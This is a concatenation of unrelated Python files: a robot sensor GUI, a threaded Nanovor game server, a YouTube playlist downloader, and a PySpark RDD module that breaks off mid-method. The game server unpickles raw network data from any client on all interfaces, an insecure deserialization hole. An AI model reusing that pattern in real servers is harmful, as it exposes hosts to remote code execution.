pos=[470,30]) dpg.add_text(message0,tag="DispMessage0") dpg.add_text(message1,tag="DispMessage1") dpg.add_text(message2,tag="DispMessage2") dpg.add_text(message3,tag="DispMessage3") # (画面右側)センサー値モニタリング用ウィンドウ ================================================== with dpg.window(label="Sensor Monitor", width=335, height=175,pos=[260,5]): with dpg.group(label='LeftSide'): dpg.add_slider_float(default_value=0, tag="mpu0", label="ac_x",max_value=327,min_value=-327,pos=[10,35], width=60) dpg.add_slider_float(default_value=0, tag="mpu1", label="ac_y",max_value=327,min_value=-327,pos=[115,35], width=60) dpg.add_slider_float(default_value=0, tag="mpu2", label="ac_z",max_value=327,min_value=-327,pos=[220,35], width=60) dpg.add_slider_float(default_value=0, tag="mpu3", label="gr_x",max_value=327,min_value=-327,pos=[10,55], width=60) dpg.add_slider_float(default_value=0, tag="mpu4", label="gr_y",max_value=327,min_value=-327,pos=[115,55], width=60) dpg.add_slider_float(default_value=0, tag="mpu5", label="gr_z",max_value=327,min_value=-327,pos=[220,55], width=60) dpg.add_slider_float(default_value=0, tag="mpu6", label="mg_x",max_value=327,min_value=-327,pos=[10,75], width=60) dpg.add_slider_float(default_value=0, tag="mpu7", label="mg_y",max_value=327,min_value=-327,pos=[115,75], width=60) dpg.add_slider_float(default_value=0, tag="mpu8", label="mg_z",max_value=327,min_value=-327,pos=[220,75], width=60) dpg.add_slider_float(default_value=0, tag="mpu9", label="temp",max_value=327,min_value=-327,pos=[10,95], width=60) dpg.add_slider_float(default_value=0, tag="mpu10", label="rol",max_value=327,min_value=-327,pos=[10,120], width=60) dpg.add_slider_float(default_value=0, tag="mpu11", label="pit",max_value=327,min_value=-327,pos=[115,120], width=60) dpg.add_slider_float(default_value=0, tag="mpu12", label="yaw",max_value=327,min_value=-327,pos=[220,120], width=60) dpg.add_button(label="SetYaw", callback=set_yaw_center, width =50, pos=[270,148]) # (画面右側中央段)コマンド送信/リモコン値表示用ウィンドウ 
================================================== with dpg.window(label="Command", width=335, height=170,pos=[260,185]): dpg.add_checkbox(label="Power", tag="Power", callback=set_servo_power, pos=[8,27]) dpg.add_checkbox(label="Action", tag="Action", callback=set_action, pos=[8,50]) dpg.add_checkbox(label="->ROS1", tag="ROS1pub", callback=ros1_pub, pos=[100,27]) dpg.add_checkbox(label="<-ROS1", tag="ROS1sub", callback=ros1_sub, pos=[100,50]) dpg.add_text("Control Pad Monitor", pos=[10,100]) dpg.add_text("button",tag="pad_button", pos=[170,100]) dpg.add_slider_int(default_value=0, tag="pad_Lx", label="Lx",max_value=127,min_value=-127, pos=[10,120], width=40) dpg.add_slider_int(default_value=0, tag="pad_Ly", label="Ly",max_value=127,min_value=-127, pos=[90,120], width=40) dpg.add_slider_int(default_value=0, tag="pad_Rx", label="Rx",max_value=127,min_value=-127, pos=[170,120], width=40) dpg.add_slider_int(default_value=0, tag="pad_Ry", label="Ry",max_value=127,min_value=-127, pos=[250,120], width=40) dpg.add_slider_int(default_value=0, tag="pad_L2v", label="L2v",max_value=255,min_value=0, pos=[90,140], width=40) dpg.add_slider_int(default_value=0, tag="pad_R2v", label="R2v",max_value=255,min_value=0, pos=[170,140], width=40) # dpg変数値の登録 with dpg.value_registry(): dpg.add_int_value(tag="button_data") dpg.setup_dearpygui() dpg.show_viewport() # dpg 描 画 内 容 の デ ー タ 更 新 ================================================== while dpg.is_dearpygui_running(): signal.signal(signal.SIGINT, signal.SIG_DFL) #メッセージ欄の表示更新 dpg.set_value("DispMessage0", message0) #メッセージ欄表示用 dpg.set_value("DispMessage1", message1) #メッセージ欄表示用 dpg.set_value("DispMessage2", message2) #メッセージ欄表示用 dpg.set_value("DispMessage3", message3) #メッセージ欄表示用 #サーボデータとIMUデータの表示更新 for i in range(0, 15, 1): #global button idld = r_meridim_disp[21+i*2] idrd = r_meridim_disp[51+i*2] idsensor = r_meridim_disp[i+2]/10000 dpg.set_value("ID L"+str(i), idld/100) #サーボIDと数値の表示L側 dpg.set_value("ID R"+str(i), idrd/100) #サーボIDと数値の表示R側 
if i < 13: #IMUデータの更新 if i < 11: dpg.set_value("mpu"+str(i),idsensor) else: dpg.set_value("mpu"+str(i),idsensor*100) #リモコンデータの表示更新 dpg.set_value("pad_button", str(r_meridim_disp[80])) dpg.set_value("pad_Lx", r_meridim_disp_char[163]) dpg.set_value("pad_Ly", r_meridim_disp_char[162]) dpg.set_value("pad_Rx", r_meridim_disp_char[165]) dpg.set_value("pad_Ry", r_meridim_disp_char[164]) padL2val = (r_meridim_disp_char[167]) if (padL2val<0): padL2val = 256+padL2val if (r_meridim_disp[80]&256==0): padL2val = 0 padR2val = (r_meridim_disp_char[166]) if (padR2val<0): padR2val = 256+padR2val if (r_meridim_disp[80]&512==0): padR2val = 0 dpg.set_value("pad_L2v", padL2val) dpg.set_value("pad_R2v", padR2val) dpg.set_value("button_data", r_meridim_disp[80]) #dpg表示更新処理 dpg.render_dearpygui_frame() dpg.destroy_context() #スレッド2つで送受信と画面描写を並列処理 if __name__ == '__main__': thread1 = threading.Thread(target=meridian_loop) #dearpyguiによるコンソール画面描写スレッド thread1.start() main()
server.py
import socket
import pickle
import threading
from NanovorCollection import*
from OnlineGame import OnlineGame
import sys, os

# Listening endpoint: all interfaces, fixed port.
HOST = ""
PORT = 50500
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(5)

#Contains lists of ongoing games
gameID = 0  # monotonically increasing id assigned to each newly created game
games = {}
#Contains each clients socket as a key, and the ID of the game they're in as a value
clients = {}

# Master rosters imported (star-import) from NanovorCollection.
server_magnamod_list = MAGNAMOD_LIST
server_velocitron_list = VELOCITRON_LIST
server_hexite_list = HEXITE_LIST
server_custom_list = CUSTOM_LIST
server_complete_list = COMPLETE_LIST

#Whether or not to include custom nanovor in the games.
FANOVOR = True


def handle_client(conn, addr):
    """Serve one client connection on its own thread.

    Runs a request/response loop in which every message is a pickled
    Python object whose type/value selects the action:

    * dict containing "SetFanovorSettings" -- toggle custom-nanovor mode
    * tuple (digit-string, username)       -- matchmaking / game join
    * roster query strings ("GetMags", "GetVels", "GetHexs", "GetCust")
    * list ["SwarmSelected", swarm]        -- register the player's swarm
    * in-game status strings ("Match Status", "Game Ongoing", "Get ...")
    * any other dict                       -- the player's turn decisions

    On any exit path (clean close or exception) the ``finally`` block
    removes the client from its game and drops empty games.
    """
    try:
        global gameID
        global FANOVOR
        connected = True
        # Per-client copies of the master rosters so a session keeps a
        # stable view even if the module-level lists were ever changed.
        magnamod_list = server_magnamod_list[:]
        velocitron_list = server_velocitron_list[:]
        hexite_list = server_hexite_list[:]
        custom_list = server_custom_list[:]
        complete_list = server_complete_list[:]
        while connected:
            # NOTE(review): assumes each pickled message arrives in a single
            # recv() of at most 32 KiB -- TCP gives no such guarantee; a
            # split message would make pickle.loads raise. Confirm payload
            # sizes stay small.
            data = pickle.loads(conn.recv(4096*8))
            if data:
                if type(data) == dict and "SetFanovorSettings" in data:
                    # Client toggles whether fan-made nanovor are offered.
                    FANOVOR = data["SetFanovorSettings"]
                    conn.send(pickle.dumps("Job completed"))
                elif type(data) == tuple:
                    if data[0].isdigit():
                        # data[0] has the number of players the user chose to play, data[1] is the users username
                        # (Players should have already entered the game, maybe..)
                        inGame = False
                        #Iterate through a copy so that if you add a new game, you don't iterate through the dict while changing it
                        for ID,game in games.copy().items():
                            if game.game_size() == int(data[0]):
                                if not(game.full()):
                                    # Open seat in an existing game of the
                                    # requested size: join it.
                                    games[ID].add_player((conn,data[1]))
                                    clients[conn] = ID
                                else:
                                    # Matching game is full: open a fresh one.
                                    # NOTE(review): this branch runs once per
                                    # *full* game of the requested size, so one
                                    # request can create several new games --
                                    # confirm that is intended.
                                    games[gameID] = OnlineGame(int(data[0]), complete_list)
                                    games[gameID].add_player((conn,data[1]))
                                    clients[conn] = gameID
                                    gameID += 1
                                inGame = True
                        if not inGame:
                            # No game of that size exists yet; create it.
                            games[gameID] = OnlineGame(int(data[0]), complete_list)
                            games[gameID].add_player((conn,data[1]))
                            clients[conn] = gameID
                            gameID += 1
                        if games[clients[conn]].full():
                            conn.send(pickle.dumps("Match is starting!"))
                        else:
                            conn.send(pickle.dumps("Waiting on more players"))
                elif data == "Check Status":
                    # Poll: has the client's game filled up yet?
                    if games[clients[conn]].full():
                        conn.send(pickle.dumps("Match is starting!"))
                    else:
                        conn.send(pickle.dumps("Waiting on more players"))
                elif data == "GetMags":
                    conn.sendall(pickle.dumps([(mag.get_name(), mag.get_sv()) for mag in magnamod_list]))
                elif data == "GetVels":
                    conn.sendall(pickle.dumps([(vel.get_name(), vel.get_sv()) for vel in velocitron_list]))
                elif data == "GetHexs":
                    # NOTE(review): loop variable `hex` shadows the builtin.
                    conn.sendall(pickle.dumps([(hex.get_name(), hex.get_sv()) for hex in hexite_list]))
                elif data == "GetCust":
                    # Custom roster is sent empty unless FANOVOR is enabled.
                    conn.sendall(pickle.dumps([(cust.get_name(), cust.get_sv()) for cust in custom_list] if FANOVOR else []))
                elif type(data) == list:
                    if data[0] == "SwarmSelected":
                        games[clients[conn]].set_swarm(conn,data[1])
                        conn.send(pickle.dumps("Swarm Confirmed"))
                        #data[1] gives the swarm of the player (each Nanovor is a string)
                elif data == "Match Status":
                    conn.send(pickle.dumps(games[clients[conn]].ready()))
                elif data == "Game Ongoing":
                    over = games[clients[conn]].gameOver(conn)
                    conn.send(pickle.dumps(over))
                    if over == "You were eliminated!":
                        break
                    #This will be True if over is anything except False, None, 0, or empty. If string or dict gets returned, it goes off as True
                    elif over:
                        break
                elif data == "Get Active Nanovor":
                    info = games[clients[conn]].gameInformation(conn)["Active Nanovor"]
                    conn.send(pickle.dumps(info))
                elif data == "Get Player Swarm":
                    info = games[clients[conn]].gameInformation(conn)["Player Swarm"]
                    conn.send(pickle.dumps(info))
                elif data == "Get Player Attacks":
                    info = games[clients[conn]].gameInformation(conn)["Player Attacks"]
                    conn.send(pickle.dumps(info))
                elif data == "Get Opponent Active":
                    info = games[clients[conn]].gameInformation(conn)["Opponent Active"]
                    conn.send(pickle.dumps(info))
                elif data == "Energy & Overrides":
                    info = games[clients[conn]].gameInformation(conn)["Energy & Overrides"]
                    conn.send(pickle.dumps(info))
                elif data == "Get All Swarms":
                    info = games[clients[conn]].gameInformation(conn)["All Swarms"]
                    conn.send(pickle.dumps(info))
                elif data == "Get Opponent Attacks":
                    info = games[clients[conn]].gameInformation(conn)["Opponent Attacks"]
                    conn.send(pickle.dumps(info))
                elif data == "Get Round Summary":
                    #Will be a function in game that returns the dict with the carnage report and updated stats for all nanovor in the game
                    #If waiting on other players, round summary will be "Waiting"
                    info = games[clients[conn]].get_round_summary()
                    conn.send(pickle.dumps(info))
                #If the data is a dict, it has to be the information received from the client about their decisions
                elif type(data) == dict:
                    #send it to a function that splits up all the information for each player, makes sure every player sent in their information, and
                    #then applies those decisions to the engine, which runs all the behind-the scenes work
                    games[clients[conn]].control_center(conn,data)
                    conn.send(pickle.dumps("Received"))
        #Close the client connection
        conn.close()
    except Exception as e:
        # Report where the failure happened (file name + line number) and
        # fall through to the cleanup in `finally`.
        exc_type, exc_obj, exc_tb = sys.exc_info()
        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
        print(exc_type, fname, exc_tb.tb_lineno)
    finally:
        # Delete the game from the dict of games, if the client is in it and if the game hasn't been deleted
        # Iterate through a copy so it doesn't raise an error when dictionary
        for id, game in games.copy().items():
            if conn in game.get_players().keys() and not game.gameOver(conn):
                game.handle_quitters(conn)
            #If the client disconnected but it isn't due to them quitting, that means the game is over, so remove them from the game.
            else:
                game.remove_player(conn)
            if len(game.get_players()) == 0:
                del games[id]
        if conn in clients:
            del clients[conn]

# Accept loop: one thread per incoming client connection.
while True:
    conn, addr = s.accept()
    thread = threading.Thread(target=handle_client, args=(conn, addr))
    thread.start()
    print('Connected by', addr)
    print(f"[ACTIVE CONNECTIONS] {threading.active_count() - 1}")
main.py
from pytube import Playlist, YouTube
from googleapiclient.discovery import build
import requests
import subprocess
import os
import time
import json
import re
import copy
import threading

lock = threading.Lock()        # serializes the ffmpeg merge step
json_lock = threading.Lock()   # guards the shared stats file across worker threads
sema = threading.Semaphore(10) # caps the number of concurrent downloads

WORKDIR = os.path.dirname(os.path.realpath(__file__)) + '/tmp5/'
JSON_NAME = 'video_stats.json'
JSON_PATH = WORKDIR + JSON_NAME

json_template = {
    "name": "crwal_youtube",
    "platform": "youtube",
    "title": "default",
    "len": 0,
    "models": []
}


def get_id(url: str):
    """Extract the YouTube video id from any of the common URL forms.

    Raises AttributeError if no id can be found (re.search returns None).
    """
    pattern = r'((?<=(v|V|e)/)|(?<=be/)|(?<=(\?|\&)v=)|(?<=embed/))([\w-]+)'
    return re.search(pattern, url).group()


class result:
    """Holder for one download outcome: a status text and the merged file path."""

    def __init__(self):
        self.text = ''       # 'completed' or 'download_failed'
        self.file_path = ''  # path of the merged mp4 (only set on success)


class _json:
    """Owns the video_stats.json bookkeeping file (shared class-level state)."""

    def __init__(self, title: str = None):
        global JSON_PATH
        # Deep-copy so repeated instantiation never mutates the shared template
        # (the original assigned the template by reference and corrupted it).
        _json.json_data = copy.deepcopy(json_template)
        if title:
            _json.json_data['title'] = title
            JSON_PATH = './' + title + '/' + JSON_NAME
        if not os.path.isfile(JSON_PATH):
            # makedirs(exist_ok=True): os.mkdir raised FileExistsError when the
            # directory already existed but the stats file did not.
            os.makedirs(os.path.dirname(JSON_PATH), exist_ok=True)
            with open(JSON_PATH, 'w') as json_file:
                json.dump(_json.json_data, json_file, indent=4)
        else:
            with open(JSON_PATH, 'r') as json_file:
                _json.json_data = json.load(json_file)

    def sub_model(self, yt, status: int, path: str = None, track: int = None):
        """Append one video record and rewrite the stats file.

        :param yt: a pytube YouTube object, or (on failure paths where no
                   object exists) the bare video-id string.
        :param status: 1 = downloaded, 0 = download failed, -1 = blocked.
        :param path: merged file path (required when status > 0).
        :param track: playlist position; defaults to the running count.
        """
        record = {}
        # Failure paths may only have an id string, not a YouTube object.
        record['id'] = yt if isinstance(yt, str) else yt.video_id
        record['status'] = status
        # sub_model is called from many worker threads; the shared dict and
        # file rewrite must not interleave.
        with json_lock:
            if status > 0:
                if not track:
                    track = _json.json_data['len'] + 1
                record['meta'] = [{
                    'title': yt.title,
                    'author': yt.author,
                    'track': track,
                    'len': yt.length,
                    'file_size': os.path.getsize(path),
                    'uploaded': False
                }]
                _json.json_data['len'] += 1
            _json.json_data['models'].append(record)
            with open(JSON_PATH, 'w') as outfile:
                json.dump(_json.json_data, outfile, indent=4)


def _YouTube(url: str):
    """Build a YouTube object, mapping known pytube failures to sentinel strings.

    Returns 'blocked_error' for unavailable videos, 'worng_url_error' for
    unparseable URLs; re-raises anything else (the original fell through to
    `return yt` with `yt` unbound, masking the real error).
    """
    try:
        return YouTube(url)
    except Exception as err:
        if 'unavailable' in str(err):
            return 'blocked_error'
        if 'regex_search' in str(err):
            return 'worng_url_error'
        raise


def download_video(url, yt):
    """Download best video+audio streams for `yt` and merge them with ffmpeg.

    :param url: kept for interface compatibility (unused; yt carries the id).
    :param yt: pytube YouTube object.
    :return: a `result` with .text in {'completed', 'download_failed'}.
    """
    _result = result()
    file_id = yt.video_id
    file_name = yt.title
    video_stream = yt.streams.filter(adaptive=True, file_extension='mp4',
                                     only_video=True).order_by(
        'resolution').desc().first().download(WORKDIR, file_id + 'video')
    audio_stream = yt.streams.filter(adaptive=True, file_extension='mp4',
                                     only_audio=True).order_by(
        'abr').desc().first().download(WORKDIR, file_id + 'audio')
    file_path = WORKDIR + '/' + file_name.replace('/', '-') + '.mp4'
    # `with lock` guarantees release even if Popen raises (the original's bare
    # acquire/release could deadlock every other worker on an exception).
    with lock:
        # shell=False (default): with shell=True and a list argument, POSIX
        # runs only 'ffmpeg' and silently drops every other argument.
        process = subprocess.Popen(
            ['ffmpeg', '-y',
             '-i', WORKDIR + '/' + file_id + 'video.mp4',
             '-i', WORKDIR + '/' + file_id + 'audio.mp4',
             file_path],
            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, err = process.communicate()
        exitcode = process.returncode
    if exitcode != 0:
        print(exitcode, out.decode('utf8'), err.decode('utf8'))
        _result.text = 'download_failed'
    else:
        _result.text = 'completed'
        _result.file_path = file_path
    # Remove the intermediate single-track files either way.
    if os.path.isfile(video_stream):
        os.remove(video_stream)
    if os.path.isfile(audio_stream):
        os.remove(audio_stream)
    return _result


def try_download(yt, i=None, url=None):
    """Handle one video: record failures, download and log on success.

    :param yt: result of `_YouTube` -- a YouTube object or an error sentinel.
    :param i: playlist track number (None for single downloads).
    :param url: the source URL, used to recover an id on the blocked path.
    """
    # Check the sentinels first: the original printed yt.title before this,
    # which on a sentinel string printed a bound str.title method.
    if yt == 'worng_url_error':
        print('Worng url ㅗ')
    elif yt == 'blocked_error':
        print('막혔음 ㅅㄱ')
        # No YouTube object exists here; record the bare id instead (the
        # original passed the raw URL into a yt.video_id access and crashed).
        j.sub_model(get_id(url) if url else 'unknown', -1)
    else:
        print(yt.title)
        dl = download_video(url, yt)
        if dl.text == 'completed':
            j.sub_model(yt, 1, dl.file_path, i)
        elif dl.text == 'download_failed':
            # track=i: the original passed i positionally into `path`.
            j.sub_model(yt, 0, track=i)


if __name__ == '__main__':
    j = _json()
    t1 = time.time()
    url = input('url : ')
    file_ext = input('extension : ')
    if 'list=' in url:
        p = Playlist(url)
        j = _json(p.title)
        WORKDIR = './' + p.title

        def _worker(video_url, track):
            # Use the per-thread URL argument: the original read the shared
            # global `url`, so every worker raced on the same last value.
            sema.acquire()
            try:
                yt = _YouTube(video_url)
                try_download(yt, track, video_url)
            finally:
                sema.release()  # always release, even if the download raises

        threads = []
        for track, video_url in enumerate(p.video_urls, start=1):
            th = threading.Thread(target=_worker, args=(video_url, track))
            th.start()
            threads.append(th)
        for th in threads:
            th.join()
    else:
        yt = _YouTube(url)
        try_download(yt, url=url)
    print(time.time() - t1)
rdd.py
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import copy import sys import os import re import operator import shlex import warnings import heapq import bisect import random import socket from subprocess import Popen, PIPE from tempfile import NamedTemporaryFile from threading import Thread from collections import defaultdict from itertools import chain from functools import reduce from math import sqrt, log, isinf, isnan, pow, ceil if sys.version > '3': basestring = unicode = str else: from itertools import imap as map, ifilter as filter from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \ BatchedSerializer, CloudPickleSerializer, PairDeserializer, \ PickleSerializer, pack_long, AutoBatchedSerializer from pyspark.join import python_join, python_left_outer_join, \ python_right_outer_join, python_full_outer_join, python_cogroup from pyspark.statcounter import StatCounter from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler from pyspark.storagelevel import StorageLevel from pyspark.resultiterable import ResultIterable from pyspark.shuffle import Aggregator, ExternalMerger, \ get_used_memory, ExternalSorter, ExternalGroupBy from pyspark.traceback_utils import SCCallSiteSync __all__ = ["RDD"] def 
portable_hash(x): """ This function returns consistent hash code for builtin types, especially for None and tuple with None. The algorithm is similar to that one used by CPython 2.7 >>> portable_hash(None) 0 >>> portable_hash((None, 1)) & 0xffffffff 219750521 """ if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ: raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED") if x is None: return 0 if isinstance(x, tuple): h = 0x345678 for i in x: h ^= portable_hash(i) h *= 1000003 h &= sys.maxsize h ^= len(x) if h == -1: h = -2 return int(h) return hash(x) class BoundedFloat(float): """ Bounded value is generated by approximate job, with confidence and low bound and high bound. >>> BoundedFloat(100.0, 0.95, 95.0, 105.0) 100.0 """ def __new__(cls, mean, confidence, low, high): obj = float.__new__(cls, mean) obj.confidence = confidence obj.low = low obj.high = high return obj def _parse_memory(s): """ Parse a memory string in the format supported by Java (e.g. 1g, 200m) and return the value in MB >>> _parse_memory("256m") 256 >>> _parse_memory("2g") 2048 """ units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024} if s[-1].lower() not in units: raise ValueError("invalid format: " + s) return int(float(s[:-1]) * units[s[-1].lower()]) def _load_from_socket(port, serializer): sock = None # Support for both IPv4 and IPv6. # On most of IPv6-ready systems, IPv6 will take precedence. for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM): af, socktype, proto, canonname, sa = res sock = socket.socket(af, socktype, proto) try: sock.settimeout(15) sock.connect(sa) except socket.error: sock.close() sock = None continue break if not sock: raise Exception("could not open socket") # The RDD materialization time is unpredicable, if we set a timeout for socket reading # operation, it will very possibly fail. See SPARK-18281. 
sock.settimeout(None) # The socket will be automatically closed when garbage-collected. return serializer.load_stream(sock.makefile("rb", 65536)) def ignore_unicode_prefix(f): """ Ignore the 'u' prefix of string in doc tests, to make it works in both python 2 and 3 """ if sys.version >= '3': # the representation of unicode string in Python 3 does not have prefix 'u', # so remove the prefix 'u' for doc tests literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE) f.__doc__ = literal_re.sub(r'\1\2', f.__doc__) return f class Partitioner(object): def __init__(self, numPartitions, partitionFunc): self.numPartitions = numPartitions self.partitionFunc = partitionFunc def __eq__(self, other): return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions and self.partitionFunc == other.partitionFunc) def __call__(self, k): return self.partitionFunc(k) % self.numPartitions class RDD(object): """ A Resilient Distributed Dataset (RDD), the basic abstraction in Spark. Represents an immutable, partitioned collection of elements that can be operated on in parallel. """ def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())): self._jrdd = jrdd self.is_cached = False self.is_checkpointed = False self.ctx = ctx self._jrdd_deserializer = jrdd_deserializer self._id = jrdd.id() self.partitioner = None def _pickled(self): return self._reserialize(AutoBatchedSerializer(PickleSerializer())) def id(self): """ A unique ID for this RDD (within its SparkContext). """ return self._id def __repr__(self): return self._jrdd.toString() def __getnewargs__(self): # This method is called when attempting to pickle an RDD, which is always an error: raise Exception( "It appears that you are attempting to broadcast an RDD or reference an RDD from an " "action or transformation. 
RDD transformations and actions can only be invoked by the " "driver, not inside of other transformations; for example, " "rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values " "transformation and count action cannot be performed inside of the rdd1.map " "transformation. For more information, see SPARK-5063." ) @property def context(self): """ The L{SparkContext} that this RDD was created on. """ return self.ctx def cache(self): """ Persist this RDD with the default storage level (C{MEMORY_ONLY}). """ self.is_cached = True self.persist(StorageLevel.MEMORY_ONLY) return self def persist(self, storageLevel=StorageLevel.MEMORY_ONLY): """ Set this RDD's storage level to persist its values across operations after the first time it is computed. This can only be used to assign a new storage level if the RDD does not have a storage level set yet. If no storage level is specified defaults to (C{MEMORY_ONLY}). >>> rdd = sc.parallelize(["b", "a", "c"]) >>> rdd.persist().is_cached True """ self.is_cached = True javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel) self._jrdd.persist(javaStorageLevel) return self def unpersist(self): """ Mark the RDD as non-persistent, and remove all blocks for it from memory and disk. """ self.is_cached = False self._jrdd.unpersist() return self def checkpoint(self): """ Mark this RDD for checkpointing. It will be saved to a file inside the checkpoint directory set with L{SparkContext.setCheckpointDir()} and all references to its parent RDDs will be removed. This function must be called before any job has been executed on this RDD. It is strongly recommended that this RDD is persisted in memory, otherwise saving it on a file will require recomputation. """ self.is_checkpointed = True self._jrdd.rdd().checkpoint() def isCheckpointed(self): """ Return whether this RDD is checkpointed and materialized, either reliably or locally. 
""" return self._jrdd.rdd().isCheckpointed() def localCheckpoint(self): """ Mark this RDD for local checkpointing using Spark's existing caching layer. This method is for users who wish to truncate RDD lineages while skipping the expensive step of replicating the materialized data in a reliable distributed file system. This is useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX). Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed data is written to ephemeral local storage in the executors instead of to a reliable, fault-tolerant storage. The effect is that if an executor fails during the computation, the checkpointed data may no longer be accessible, causing an irrecoverable job failure. This is NOT safe to use with dynamic allocation, which removes executors along with their cached blocks. If you must use both features, you are advised to set L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value. The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used. """ self._jrdd.rdd().localCheckpoint() def isLocallyCheckpointed(self): """ Return whether this RDD is marked for local checkpointing. Exposed for testing. """ return self._jrdd.rdd().isLocallyCheckpointed() def getCheckpointFile(self): """ Gets the name of the file to which this RDD was checkpointed Not defined if RDD is checkpointed locally. """ checkpointFile = self._jrdd.rdd().getCheckpointFile() if checkpointFile.isDefined(): return checkpointFile.get() def map(self, f, preservesPartitioning=False): """ Return a new RDD by applying a function to each element of this RDD. 
>>> rdd = sc.parallelize(["b", "a", "c"]) >>> sorted(rdd.map(lambda x: (x, 1)).collect()) [('a', 1), ('b', 1), ('c', 1)] """ def func(_, iterator): return map(f, iterator) return self.mapPartitionsWithIndex(func, preservesPartitioning) def flatMap(self, f, preservesPartitioning=False): """ Return a new RDD by first applying a function to all elements of this RDD, and then flattening the results. >>> rdd = sc.parallelize([2, 3, 4]) >>> sorted(rdd.flatMap(lambda x: range(1, x)).collect()) [1, 1, 1, 2, 2, 3] >>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect()) [(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)] """ def func(s, iterator): return chain.from_iterable(map(f, iterator)) return self.mapPartitionsWithIndex(func, preservesPartitioning) def mapPartitions(self, f, preservesPartitioning=False): """ Return a new RDD by applying a function to each partition of this RDD. >>> rdd = sc.parallelize([1, 2, 3, 4], 2) >>> def f(iterator): yield sum(iterator) >>> rdd.mapPartitions(f).collect() [3, 7] """ def func(s, iterator): return f(iterator) return self.mapPartitionsWithIndex(func, preservesPartitioning) def mapPartitionsWithIndex(self, f, preservesPartitioning=False): """ Return a new RDD by applying a function to each partition of this RDD, while tracking the index of the original partition. >>> rdd = sc.parallelize([1, 2, 3, 4], 4) >>> def f(splitIndex, iterator): yield splitIndex >>> rdd.mapPartitionsWithIndex(f).sum() 6 """ return PipelinedRDD(self, f, preservesPartitioning) def mapPartitionsWithSplit(self, f, preservesPartitioning=False): """ Deprecated: use mapPartitionsWithIndex instead. Return a new RDD by applying a function to each partition of this RDD, while tracking the index of the original partition. 
>>> rdd = sc.parallelize([1, 2, 3, 4], 4) >>> def f(splitIndex, iterator): yield splitIndex >>> rdd.mapPartitionsWithSplit(f).sum() 6 """ warnings.warn("mapPartitionsWithSplit is deprecated; " "use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2) return self.mapPartitionsWithIndex(f, preservesPartitioning) def getNumPartitions(self): """ Returns the number of partitions in RDD >>> rdd = sc.parallelize([1, 2, 3, 4], 2) >>> rdd.getNumPartitions() 2 """ return self._jrdd.partitions().size() def filter(self, f): """ Return a new RDD containing only the elements that satisfy a predicate. >>> rdd = sc.parallelize([1, 2, 3, 4, 5]) >>> rdd.filter(lambda x: x % 2 == 0).collect() [2, 4] """ def func(iterator): return filter(f, iterator) return self.mapPartitions(func, True) def distinct(self, numPartitions=None): """ Return a new RDD containing the distinct elements in this RDD. >>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect()) [1, 2, 3] """ return self.map(lambda x: (x, None)) \ .reduceByKey(lambda x, _: x, numPartitions) \ .map(lambda x: x[0]) def sample(self, withReplacement, fraction, seed=None): """ Return a sampled subset of this RDD. :param withReplacement: can elements be sampled multiple times (replaced when sampled out) :param fraction: expected size of the sample as a fraction of this RDD's size without replacement: probability that each element is chosen; fraction must be [0, 1] with replacement: expected number of times each element is chosen; fraction must be >= 0 :param seed: seed for the random number generator .. note:: This is not guaranteed to provide exactly the fraction specified of the total count of the given :class:`DataFrame`. 
>>> rdd = sc.parallelize(range(100), 4) >>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14 True """ assert fraction >= 0.0, "Negative fraction value: %s" % fraction return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True) def randomSplit(self, weights, seed=None): """ Randomly splits this RDD with the provided weights. :param weights: weights for splits, will be normalized if they don't sum to 1 :param seed: random seed :return: split RDDs in a list >>> rdd = sc.parallelize(range(500), 1) >>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17) >>> len(rdd1.collect() + rdd2.collect()) 500 >>> 150 < rdd1.count() < 250 True >>> 250 < rdd2.count() < 350 True """ s = float(sum(weights)) cweights = [0.0] for w in weights: cweights.append(cweights[-1] + w / s) if seed is None: seed = random.randint(0, 2 ** 32 - 1) return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True) for lb, ub in zip(cweights, cweights[1:])] # this is ported from scala/spark/RDD.scala def takeSample(self, withReplacement, num, seed=None): """ Return a fixed-size sampled subset of this RDD. .. note:: This method should only be used if the resulting array is expected to be small, as all the data is loaded into the driver's memory. >>> rdd = sc.parallelize(range(0, 10)) >>> len(rdd.takeSample(True, 20, 1)) 20 >>> len(rdd.takeSample(False, 5, 2)) 5 >>> len(rdd.takeSample(False, 15, 3)) 10 """ numStDev = 10.0 if num < 0: raise ValueError("Sample size cannot be negative.") elif num == 0: return [] initialCount = self.count() if initialCount == 0: return [] rand = random.Random(seed) if (not withReplacement) and num >= initialCount: # shuffle current RDD and return 